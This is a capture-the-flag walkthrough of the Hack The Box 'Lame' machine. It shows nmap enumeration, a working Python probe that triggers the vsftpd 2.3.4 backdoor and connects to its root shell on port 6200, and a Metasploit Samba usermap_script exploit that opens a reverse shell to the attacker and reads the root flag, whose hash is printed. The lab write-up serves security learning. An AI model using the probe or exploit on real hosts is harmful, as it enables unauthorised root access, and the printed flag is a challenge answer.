HTB: Lame
Introduction
This is a machine from hackthebox.eu. According to the HTB policy I can publish this write-up since the machine is ‘retired’.
Enumeration
Starting with a full TCP port scan including service and OS detection. Only five of the 65535 ports answer; the rest are filtered.
Starting Nmap 7.60 ( https://nmap.org ) at 2017-09-29 08:54 CEST
Nmap scan report for 10.10.10.3
Host is up (0.025s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.3
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Arris TG862G/CT cable modem (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%), Linux 2.4.27 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2017-09-29T02:55:45-04:00
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using proto 1/icmp)
HOP RTT      ADDRESS
1   27.12 ms 10.10.14.1
2   24.79 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 200.03 seconds
At first sight the entry point looks like the FTP service on port 21. vsftpd 2.3.4 is the release whose source tarball was trojaned with an intended backdoor: a username containing ":)" makes the daemon open a root shell on port 6200/tcp, reachable from the outside without any authentication. Oddly enough, after several tries this known backdoor isn't responding. Time to check the next possible vulnerability.
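A standalone probe for that backdoor, added here as an example (it is neither the original post's code nor Metasploit's vsftpd_234_backdoor module). The target address, the FakeVsftpd class and the sample responses are assumptions; the fake server is a constructed stand-in that imitates the trojaned daemon so the demo runs offline, and probe() works the same way against a real host.

```python
"""Probe for the vsftpd 2.3.4 backdoor.

Added example, not code from the original write-up. The trojaned 2.3.4
tarball reacts to a USER line containing ":)" by blocking in accept() on
port 6200/tcp and handing whoever connects a root /bin/sh. probe() sends
the trigger and then tries that port; FakeVsftpd is a constructed
stand-in so the demo runs offline.
"""
import socket
import threading

TRIGGER_USER = b"x:)"   # any username containing ":)" fires the backdoor
BACKDOOR_PORT = 6200    # hard-coded listener port in the trojaned source


def send_trigger(host, port=21, timeout=3.0):
    """Send USER/PASS with the smiley and do not wait for replies: once the
    backdoor is armed the control connection never answers again."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(1024)
        s.sendall(b"USER " + TRIGGER_USER + b"\r\n")
        s.sendall(b"PASS anything\r\n")
    return banner


def check_shell(host, port=BACKDOOR_PORT, timeout=3.0):
    """Connect to the backdoor port and run `id`; None if it is not there."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(b"id\n")
            return s.recv(1024).decode(errors="replace").strip()
    except OSError:          # refused, reset or timed out: no backdoor
        return None


def probe(host, ftp_port=21, backdoor_port=BACKDOOR_PORT):
    """Full check: trigger, then look for the shell. Returns `id` output or None."""
    send_trigger(host, ftp_port)
    return check_shell(host, backdoor_port)


class FakeVsftpd(threading.Thread):
    """Constructed imitation of vsftpd 2.3.4 on 127.0.0.1, ephemeral ports.
    With backdoored=True it mimics the trojan (silent after the trigger,
    answers `id` on the shell port); with False the shell port is closed."""

    def __init__(self, backdoored=True):
        super().__init__(daemon=True)
        self.backdoored = backdoored
        self.ftp = socket.socket()
        self.ftp.bind(("127.0.0.1", 0))
        self.ftp.listen(1)
        self.ftp_port = self.ftp.getsockname()[1]
        self.shell = socket.socket()
        self.shell.bind(("127.0.0.1", 0))
        self.shell.listen(1)
        self.backdoor_port = self.shell.getsockname()[1]
        if not backdoored:
            self.shell.close()   # nothing listens: connects get refused

    def run(self):
        conn, _ = self.ftp.accept()
        with conn:
            conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
            user = conn.recv(1024)
            if self.backdoored and b":)" in user:
                sh, _ = self.shell.accept()   # like the real accept() loop
                with sh:
                    if sh.recv(1024).strip() == b"id":
                        sh.sendall(b"uid=0(root) gid=0(root)\n")
            else:
                conn.sendall(b"331 Please specify the password.\r\n")
        self.ftp.close()
        if self.backdoored:
            self.shell.close()


def demo():
    """Probe a backdoored and a clean fake; returns their two results."""
    results = []
    for backdoored in (True, False):
        fake = FakeVsftpd(backdoored)
        fake.start()
        results.append(probe("127.0.0.1", fake.ftp_port, fake.backdoor_port))
    return tuple(results)


if __name__ == "__main__":
    print(demo())                      # ('uid=0(root) gid=0(root)', None)
    # Against the box itself: print(probe("10.10.10.3"))
```

The probe deliberately does not wait for FTP replies after the USER line, because an armed backdoor blocks in accept() and never answers on the control channel; a probe that waits for the 331 response looks exactly like the "not responding" behaviour described above even when the shell is there.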
After checking exploit-db it seems this Samba version is vulnerable: Samba 3.0.20, the version nmap pulled from port 445, has the "username map script" command-injection bug (CVE-2007-2447), and Metasploit ships exploit/multi/samba/usermap_script for it. The distccd service on port 3632 is another known way in (CVE-2004-2687), but Samba is the quicker one.
msf exploit(usermap_script) > exploit -j
[*] Exploit running as background job 3.
[*] Started reverse TCP double handler on 10.10.14.3:4444
msf exploit(usermap_script) > [*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo i2UsybyxuoY1LtnB;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "i2UsybyxuoY1LtnB\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.3:4444 -> 10.10.10.3:45093) at 2017-09-29 09:12:49 +0200
msf exploit(usermap_script) > sessions -i 1
[*] Starting interaction with 1...
id
uid=0(root) gid=0(root)
cd /root
ls -lah
total 80K
drwxr-xr-x 13 root root 4.0K Sep 28 23:47 .
drwxr-xr-x 21 root root 4.0K May 20  2012 ..
-rw-------  1 root root  373 Sep 28 23:47 .Xauthority
lrwxrwxrwx  1 root root    9 May 14  2012 .bash_history -> /dev/null
-rw-r--r--  1 root root 2.2K Oct 20  2007 .bashrc
drwx------  3 root root 4.0K May 20  2012 .config
drwx------  2 root root 4.0K May 20  2012 .filezilla
drwxr-xr-x  5 root root 4.0K Sep 28 23:47 .fluxbox
drwx------  2 root root 4.0K May 20  2012 .gconf
drwx------  2 root root 4.0K May 20  2012 .gconfd
drwxr-xr-x  2 root root 4.0K May 20  2012 .gstreamer-0.10
drwx------  4 root root 4.0K May 20  2012 .mozilla
-rw-r--r--  1 root root  141 Oct 20  2007 .profile
drwx------  5 root root 4.0K May 20  2012 .purple
-rwx------  1 root root    4 May 20  2012 .rhosts
drwxr-xr-x  2 root root 4.0K May 20  2012 .ssh
drwx------  2 root root 4.0K Sep 28 23:47 .vnc
drwxr-xr-x  2 root root 4.0K May 20  2012 Desktop
-rwx------  1 root root  401 May 20  2012 reset_logs.sh
-rw-------  1 root root   33 Mar 14  2017 root.txt
-rw-r--r--  1 root root  118 Sep 28 23:47 vnc.log
cat root.txt
92caac3be140ef409e45721348a4e9df
And there is the flag that proves ownership of the box. No privilege escalation was needed: smbd runs as root, so the command injected through the username map script already runs as root.